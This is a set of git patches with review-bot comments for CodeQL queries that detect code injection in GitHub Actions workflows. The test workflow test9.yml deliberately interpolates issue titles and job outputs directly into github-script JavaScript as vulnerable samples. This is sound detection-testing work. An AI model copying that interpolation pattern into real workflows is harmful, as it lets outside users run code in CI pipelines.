@@ -1194,14 +1194,40 @@ string getASimpleReferenceExpression(string s, int offset) { .regexpCapture("([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)", 1) } +bindingset[s] +string getAFromJsonReferenceExpression(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("(?i)fromjson\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + _, offset) + .regexpCapture("(?i)fromjson\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + 1) +} + +bindingset[s] +string getAToJsonReferenceExpression(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("(?i)tojson\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + _, offset) + .regexpCapture("(?i)tojson\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + 1) +} + bindingset[s] string getAJsonReferenceExpression(string s, int offset) { // We use `regexpFind` to obtain *all* matches of `${{...}}`, // not just the last (greedy match) or first (reluctant match). result = s.trim() - .regexpFind("(?i)fromjson\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\).*", _, offset) - .regexpCapture("(?i)fromjson\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\).*", 1) + .regexpFind("(?i)(from|to)json\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + _, offset) + .regexpCapture("(?i)(from|to)json\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + 2) } /** diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index 7e14825a295..3b968ceaf13 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql 
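Review bot: The comment `// We use regexpFind to obtain *all* matches of ${{...}}` is copied into both new predicates, but none of the three patterns matches `${{...}}`; they match `fromJson(...)`/`toJson(...)` calls. It should say so, e.g. `// regexpFind yields every toJson(<ref>) call in s; the result is the argument <ref>`. The same character class is now spelled out in six literals across `getAFromJsonReferenceExpression`, `getAToJsonReferenceExpression` and `getAJsonReferenceExpression`. Because the code-injection queries in this commit use `getAToJsonReferenceExpression` to suppress alerts, a later fix applied to only one copy would quietly change what is suppressed. A private helper taking the function-name pattern keeps them in step, and a non-capturing group lets the combined form keep capture index 1.

```ql
/** Gets the argument of a call to the JSON function matched by `fn` (a regex fragment) found in `s`. */
bindingset[s, fn]
private string getAJsonCallArgument(string s, string fn, int offset) {
  exists(string ref | ref = "[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]" |
    result =
      s.trim()
          .regexpFind("(?i)" + fn + "\\(" + ref + "+\\)" + ref + "*", _, offset)
          .regexpCapture("(?i)" + fn + "\\((" + ref + "+)\\)" + ref + "*", 1)
  )
}

bindingset[s]
string getAToJsonReferenceExpression(string s, int offset) {
  result = getAJsonCallArgument(s, "tojson", offset)
}

// … getAFromJsonReferenceExpression: same with "fromjson" …

bindingset[s]
string getAJsonReferenceExpression(string s, int offset) {
  result = getAJsonCallArgument(s, "(?:from|to)json", offset)
}
```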
@@ -25,6 +25,12 @@ where inPrivilegedCompositeAction(sink.getNode().asExpr()) or inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) + ) and + // exclude cases where the sink is a JS script and the expression uses toJson + not exists(UsesStep script | + script.getCallee() = "actions/github-script" and + script.getArgumentExpr("script") = sink.getNode().asExpr() and + exists(getAToJsonReferenceExpression(sink.getNode().asExpr().(Expression).getExpression(), _)) ) select sink.getNode(), source, sink, "Potential code injection in $@, which may be controlled by an external user.", sink, diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.ql b/ql/src/Security/CWE-094/CodeInjectionMedium.ql index 7599ef8847b..abecaf997c6 100644 --- a/ql/src/Security/CWE-094/CodeInjectionMedium.ql +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.ql @@ -24,6 +24,12 @@ where ( inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or inNonPrivilegedJob(sink.getNode().asExpr()) + ) and + // exclude cases where the sink is a JS script and the expression uses toJson + not exists(UsesStep script | + script.getCallee() = "actions/github-script" and + script.getArgumentExpr("script") = sink.getNode().asExpr() and + exists(getAToJsonReferenceExpression(sink.getNode().asExpr().(Expression).getExpression(), _)) ) select sink.getNode(), source, sink, "Potential code injection in $@, which may be controlled by an external user.", sink, diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml index 6ed7db83cb2..47e032fd727 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml 
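Review bot: The new `not exists(UsesStep script | ...)` exclusion treats a `toJson(` call anywhere in the expression as sanitising the whole sink, because `getAToJsonReferenceExpression` uses an unanchored `regexpFind`. An expression that wraps one operand in `toJson` and leaves another user-controlled operand unwrapped would therefore drop out of the results. A conservative alternative is to require the whole expression to be the call, e.g. `sink.getNode().asExpr().(Expression).getExpression().regexpMatch("(?i)\\s*tojson\\([^()]*\\)\\s*")`, with a mixed case added to test9.yml to pin it. The exclusion also assumes the interpolation sits in bare JavaScript expression position; inside a quoted string or template literal in the script, JSON quoting does not match the surrounding context, so a comment such as `// toJson is treated as safe only when the value is used as a bare JS expression in the github-script 'script' input` would record that assumption. The same clause is added in CodeInjectionMedium.ql, and in both files the `where` clause starts outside the hunk.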
@@ -25,3 +25,15 @@ jobs: - run: echo ${{ needs.parse-issue.outputs.payload }} - run: echo ${{ fromJson(needs.parse-issue.outputs.payload) }} - run: echo ${{ fromJson(needs.parse-issue.outputs.payload).version }} + - uses: actions/github-script@v7 + with: + script: | + core.setOutput('issue_title', ${{ fromJson(needs.parse-issue.outputs.payload).version }}.replaceAll(/"/g, '\\"')); + - uses: actions/github-script@v7 + with: + script: | + core.setOutput('issue_title', ${{ toJson(github.event.issue.title) }}.replaceAll(/"/g, '\\"')); + - uses: actions/github-script@v7 + with: + script: | + core.setOutput('issue_title', ${{ github.event.issue.title }}.replaceAll(/"/g, '\\"')); diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index ff378f93af6..7f99d7c9b83 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -1,3 +1,4 @@ +WARNING: Unused predicate test (CodeInjectionCritical.ql:21,11-15) edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | 
@@ -70,6 +71,7 @@ edges | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | provenance | | | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | provenance | | | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | 
@@ -264,6 +266,9 @@ nodes | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | semmle.label | fromJson(needs.parse-issue.outputs.payload) | | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | +| .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -369,6 +374,8 @@ subpaths | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 19b72ad6b5c..f835d492f68 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -70,6 +70,7 @@ edges | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | provenance | | | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | provenance | | | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | 
@@ -264,6 +265,9 @@ nodes | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | semmle.label | fromJson(needs.parse-issue.outputs.payload) | | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | +| .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 69db192378e35b8ec91bbdcf7c04229129460134 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Jul 2024 12:40:48 +0200 Subject: [PATCH 0375/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- .../query-tests/Security/CWE-094/.github/workflows/test9.yml | 4 ++++ .../Security/CWE-094/CodeInjectionCritical.expected | 2 +- .../query-tests/Security/CWE-094/CodeInjectionMedium.expected | 1 + 5 files changed, 8 insertions(+), 3 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 320ef23e413..34000094dd8 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.11 +version: 0.1.12 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e7a98574a89..5ccbc7b9657 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.11 +version: 0.1.12 groups: [actions, queries] suites: codeql-suites extractor: javascript diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml index 47e032fd727..2d60b9fe6d4 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml @@ -37,3 +37,7 @@ jobs: with: script: | core.setOutput('issue_title', ${{ github.event.issue.title }}.replaceAll(/"/g, '\\"')); + - uses: actions/github-script@v7 + with: + script: | + core.setOutput('issue_title', ${{ toJson(github.event.issue.title) }}.replaceAll(/"/g, '\\"')); diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 7f99d7c9b83..16119dd6453 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -1,4 +1,3 @@ -WARNING: Unused predicate test (CodeInjectionCritical.ql:21,11-15) edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | 
@@ -269,6 +268,7 @@ nodes | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | | .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/test9.yml:43:42:43:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index f835d492f68..d0834f0dff8 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -268,6 +268,7 @@ nodes | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | | .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/test9.yml:43:42:43:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 7d58beba677157cac60f19b05981da0e1f522d74 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 4 Jul 2024 13:04:59 +0200 Subject: [PATCH 0376/1267] Better control check support --- ql/lib/codeql/actions/Ast.qll | 10 ++- ql/lib/codeql/actions/Helper.qll | 34 ++++++-- ql/lib/codeql/actions/ast/internal/Ast.qll | 28 +++++++ .../codeql/actions/security/ControlChecks.qll | 77 +++++++++++++++++-- .../actions/security/PoisonableSteps.qll | 5 +- .../security/UntrustedCheckoutQuery.qll | 32 ++++++++ .../CWE-077/EnvPathInjectionCritical.ql | 8 +- .../CWE-077/EnvPathInjectionMedium.ql | 12 +-- .../CWE-077/EnvVarInjectionCritical.ql | 22 ++---- .../Security/CWE-077/EnvVarInjectionMedium.ql | 18 ++--- .../CWE-078/CommandInjectionCritical.ql | 6 +- .../CWE-078/CommandInjectionMedium.ql | 5 +- .../Security/CWE-094/CodeInjectionCritical.ql | 7 +- .../Security/CWE-094/CodeInjectionMedium.ql | 6 +- ql/src/Security/CWE-349/CachePoisoning.ql | 5 +- .../CWE-349/CachePoisoningByCodeInjection.ql | 13 ++-- .../UntrustedCheckoutTOCTOUCritical.ql | 33 ++------ .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 35 ++------- .../CWE-829/ArtifactPoisoningCritical.ql | 7 +- .../CWE-829/ArtifactPoisoningMedium.ql | 6 +- .../CWE-829/UntrustedCheckoutCritical.ql | 8 +- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 8 +- .../CWE-829/UntrustedCheckoutMedium.ql | 7 +- .../CWE-367/.github/workflows/comment.yml | 37 +++++++-- .../UntrustedCheckoutTOCTOUCritical.expected | 18 ++--- .../CWE-829/.github/workflows/test5.yml | 68 ++++++++++++++++ .../CWE-829/.github/workflows/test6.yml | 45 +++++++++++ .../UntrustedCheckoutCritical.expected | 13 ++++ .../CWE-829/UntrustedCheckoutMedium.expected | 1 + 29 files changed, 392 insertions(+), 182 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 5e7c6d77c3e..0662f100fe4 100644 
--- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -287,13 +287,21 @@ abstract class SimpleReferenceExpression extends AstNode instanceof SimpleRefere AstNode getTarget() { result = super.getTarget() } } +class JsonReferenceExpression extends AstNode instanceof JsonReferenceExpressionImpl { + string getAccessPath() { result = super.getAccessPath() } + + string getInnerExpression() { result = super.getInnerExpression() } +} + class SecretsExpression extends SimpleReferenceExpression instanceof SecretsExpressionImpl { } class StepsExpression extends SimpleReferenceExpression instanceof StepsExpressionImpl { string getStepId() { result = super.getStepId() } } -class NeedsExpression extends SimpleReferenceExpression instanceof NeedsExpressionImpl { } +class NeedsExpression extends SimpleReferenceExpression instanceof NeedsExpressionImpl { + string getNeededJobId() { result = super.getNeededJobId() } +} class JobsExpression extends SimpleReferenceExpression instanceof JobsExpressionImpl { } diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 72dc7bf1687..3c7091d2a85 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -1,5 +1,6 @@ private import codeql.actions.Ast private import codeql.Locations +private import codeql.actions.security.ControlChecks bindingset[expr] string normalizeExpr(string expr) { 
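Review bot: `JsonReferenceExpression` and the new `NeedsExpression.getNeededJobId()` are added without QLDoc, so the hunk does not say what `getAccessPath()` and `getInnerExpression()` return. Going by the patterns added to `ast/internal/Ast.qll` in this commit, the class could carry `/** A fromJson(...) or toJson(...) call in a workflow expression. */` and `getAccessPath()` could carry `/** Gets the text that follows the closing parenthesis of the call; may be empty. */`. `getInnerExpression()` presumably returns the argument of the call, which should be confirmed against `getAJsonReferenceExpression` before documenting it. This matters to readers because `UntrustedCheckoutQuery.qll` classifies checkouts by matching substrings of both values.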
@@ -215,6 +216,20 @@ predicate inPrivilegedCompositeAction(AstNode node) { ) } +predicate inPrivilegedExternallyTriggerableJob(AstNode node) { + exists(Job j | + j = node.getEnclosingJob() and + j.isPrivilegedExternallyTriggerable() and + not exists(ControlCheck check, Event e | j.getATriggerEvent() = e | check.protects(node, e)) + ) +} + +predicate inPrivilegedContext(AstNode node) { + inPrivilegedCompositeAction(node) + or + inPrivilegedExternallyTriggerableJob(node) +} + predicate inNonPrivilegedCompositeAction(AstNode node) { exists(CompositeAction a | a = node.getEnclosingCompositeAction() and @@ -222,13 +237,6 @@ predicate inNonPrivilegedCompositeAction(AstNode node) { ) } -predicate inPrivilegedExternallyTriggerableJob(AstNode node) { - exists(Job j | - j = node.getEnclosingJob() and - j.isPrivilegedExternallyTriggerable() - ) -} - predicate inNonPrivilegedJob(AstNode node) { exists(Job j | j = node.getEnclosingJob() and @@ -236,6 +244,12 @@ predicate inNonPrivilegedJob(AstNode node) { ) } +predicate inNonPrivilegedContext(AstNode node) { + inNonPrivilegedCompositeAction(node) + or + inNonPrivilegedJob(node) +} + bindingset[snippet] predicate outputsPartialFileContent(string snippet) { // e.g. @@ -244,5 +258,9 @@ predicate outputsPartialFileContent(string snippet) { // yq '.foo' foo.yml >> $GITHUB_PATH // cat foo.txt >> $GITHUB_PATH snippet - .regexpMatch(["(\\$\\(|`)<.*", ".*(\\b|^|\\s+)" + ["cat\\s+", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+", "ls\\s+"] + ".*"]) + .regexpMatch([ + "(\\$\\(|`)<.*", + ".*(\\b|^|\\s+)" + ["cat\\s+", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+", "ls\\s+"] + + ".*" + ]) } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 7c7c6216b1b..bb31e198cc6 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
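Review bot: In `inPrivilegedExternallyTriggerableJob`, the added `not exists(ControlCheck check, Event e | j.getATriggerEvent() = e | check.protects(node, e))` removes the node as soon as a check covers any one trigger event of the job. A job that listens to both `pull_request_target` and `issue_comment` would stop being reported once a check covers `pull_request_target`, even though every check in this commit lists only `pull_request` and `pull_request_target` as protected events. Asking for an uncovered trigger keeps the finding in that case: `exists(Event e | j.getATriggerEvent() = e and e.isExternallyTriggerable() and not exists(ControlCheck check | check.protects(node, e)))`. The `CachePoisoning.ql` and `CachePoisoningByCodeInjection.ql` hunks have the same shape: they bind `e` as the externally triggerable event but test `check.protects(..., j.getATriggerEvent())`, where passing `e` would tie the check to the event under analysis.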
@@ -1230,6 +1230,18 @@ string getAJsonReferenceExpression(string s, int offset) { 2) } +bindingset[s] +string getAJsonReferenceAccessPath(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("(?i)(from|to)json\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + _, offset) + .regexpCapture("(?i)(from|to)json\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*)", + 3) +} + /** * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability @@ -1245,6 +1257,20 @@ abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { abstract AstNodeImpl getTarget(); } +class JsonReferenceExpressionImpl extends ExpressionImpl { + string innerExpression; + string accessPath; + + JsonReferenceExpressionImpl() { + innerExpression = getAJsonReferenceExpression(expression, _) and + accessPath = getAJsonReferenceAccessPath(expression, _) + } + + string getInnerExpression() { result = innerExpression } + + string getAccessPath() { result = accessPath } +} + private string stepsCtxRegex() { result = wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } @@ -1359,6 +1385,8 @@ class NeedsExpressionImpl extends SimpleReferenceExpressionImpl { ) } + string getNeededJobId() { result = neededJob.getId() } + override string getFieldName() { result = fieldName } override AstNodeImpl getTarget() { diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 28bc938f8c8..ec7e0ad0598 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll 
